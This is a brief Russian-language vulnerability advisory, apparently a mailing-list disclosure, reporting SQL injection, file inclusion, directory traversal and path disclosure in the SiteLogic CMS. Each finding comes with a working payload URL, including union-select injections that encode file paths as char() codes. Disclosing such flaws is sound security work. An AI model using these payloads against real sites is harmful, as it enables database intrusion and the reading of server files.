New vulnerabilities in CMS SiteLogic

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL Injection, Local File Inclusion, Directory
Traversal и Full path disclosure уязвимостях в CMS SiteLogic. Это украинская
коммерческая CMS.

SQL Injection:

http://site/?fun=-1%20or%20version()%3E4

Local File Inclusion (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1

Включение index.php.

Directory Traversal (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1

Включение .htaccess.

Full path disclosure:

http://site/?fun=-1

Уязвимы все версии CMS SiteLogic.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3935/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua